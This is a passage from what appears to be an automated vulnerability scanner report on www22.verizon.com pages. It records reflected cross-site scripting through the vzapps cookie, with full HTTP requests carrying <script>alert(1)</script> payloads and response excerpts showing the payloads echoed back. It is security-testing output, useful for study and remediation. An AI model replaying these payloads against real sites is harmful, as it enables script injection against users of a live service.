Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:16 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TXAF6D8<SCRIPT>ALERT(1)</SCRIPT>B1212CF33EE </DIV>
...[SNIP]...

1.54. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8d1de'><script>alert(1)</script>c5602c17654 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX8d1de'><script>alert(1)</script>c5602c17654; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119136
Expires: Sat, 20 Nov 2010 00:13:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:49 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=TX8d1de'><script>alert(1)</script>c5602c17654; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:49 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX8D1DE'><SCRIPT>ALERT(1)</SCRIPT>C5602C17654 ' />
...[SNIP]...

1.55. http://www22.verizon.com/Residential/FiOSInternet/Installation/Installation.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Installation/Installation.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 46d05<script>alert(1)</script>d1f2b7396b5 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Installation/Installation.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX46d05<script>alert(1)</script>d1f2b7396b5; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119132
Expires: Sat, 20 Nov 2010 00:14:06 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:14:06 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/
Set-Cookie: ContextInfo_State=TX46d05<script>alert(1)</script>d1f2b7396b5; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:14:06 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX46D05<SCRIPT>ALERT(1)</SCRIPT>D1F2B7396B5 </DIV>
...[SNIP]...

1.56. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 97b68<script>alert(1)</script>c16b73f542d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX97b68<script>alert(1)</script>c16b73f542d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 117590
Expires: Sat, 20 Nov 2010 00:12:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:54 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/
Set-Cookie: ContextInfo_State=TX97b68<script>alert(1)</script>c16b73f542d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:54 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX97B68<SCRIPT>ALERT(1)</SCRIPT>C16B73F542D </DIV>
...[SNIP]...

1.57. http://www22.verizon.com/Residential/FiOSInternet/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ee786'><script>alert(1)</script>78ce639b9c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Overview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXee786'><script>alert(1)</script>78ce639b9c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 119134
Expires: Sat, 20 Nov 2010 00:12:41 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:41 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=TXee786'><script>alert(1)</script>78ce639b9c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:41 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXEE786'><SCRIPT>ALERT(1)</SCRIPT>78CE639B9C ' />
...[SNIP]...

1.58. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 513ee<script>alert(1)</script>274881b5bf8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX513ee<script>alert(1)</script>274881b5bf8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 148890
Expires: Sat, 20 Nov 2010 00:12:18 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:18 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX513EE<SCRIPT>ALERT(1)</SCRIPT>274881B5BF8 </DIV>
...[SNIP]...

1.59. http://www22.verizon.com/Residential/FiOSInternet/Plans/Plans.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSInternet/Plans/Plans.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c469d'><script>alert(1)</script>c411bde7de8 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSInternet/Plans/Plans.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc469d'><script>alert(1)</script>c411bde7de8; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 148894
Expires: Sat, 20 Nov 2010 00:11:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:52 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC469D'><SCRIPT>ALERT(1)</SCRIPT>C411BDE7DE8 ' />
...[SNIP]...

1.60. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3a42'><script>alert(1)</script>fbf87ca090d was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXb3a42'><script>alert(1)</script>fbf87ca090d; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102485
Expires: Sat, 20 Nov 2010 00:12:19 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:19 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=TXb3a42'><script>alert(1)</script>fbf87ca090d; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:19 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXB3A42'><SCRIPT>ALERT(1)</SCRIPT>FBF87CA090D ' />
...[SNIP]...

1.61. http://www22.verizon.com/Residential/FiOSTV/Channels/Channels.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Channels/Channels.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 184ee<script>alert(1)</script>f56d57ce32c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Channels/Channels.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX184ee<script>alert(1)</script>f56d57ce32c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 102481
Expires: Sat, 20 Nov 2010 00:12:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:12:33 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/
Set-Cookie: ContextInfo_State=TX184ee<script>alert(1)</script>f56d57ce32c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:12:33 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX184EE<SCRIPT>ALERT(1)</SCRIPT>F56D57CE32C </DIV>
...[SNIP]...

1.62. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18907'><script>alert(1)</script>cc88d71fd80 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX18907'><script>alert(1)</script>cc88d71fd80; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79336
Expires: Sat, 20 Nov 2010 00:13:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:02 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=TX18907'><script>alert(1)</script>cc88d71fd80; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:02 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX18907'><SCRIPT>ALERT(1)</SCRIPT>CC88D71FD80 ' />
...[SNIP]...

1.63. http://www22.verizon.com/Residential/FiOSTV/Equipment/Equipment.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Equipment/Equipment.htm

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload 9ef9c<script>alert(1)</script>ac3a5bc187c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Equipment/Equipment.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX9ef9c<script>alert(1)</script>ac3a5bc187c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 79332
Expires: Sat, 20 Nov 2010 00:13:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:13:13 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/
Set-Cookie: ContextInfo_State=TX9ef9c<script>alert(1)</script>ac3a5bc187c; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:13:12 GMT; path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<DIV style="FLOAT: left" id=yourlocation>TX9EF9C<SCRIPT>ALERT(1)</SCRIPT>AC3A5BC187C </DIV>
...[SNIP]...

1.64. http://www22.verizon.com/Residential/FiOSTV/Overview.htm [vzapps cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www22.verizon.com
Path:	/Residential/FiOSTV/Overview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8f58f'><script>alert(1)</script>45f51d22094 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/FiOSTV/Overview.htm HTTP/1.1
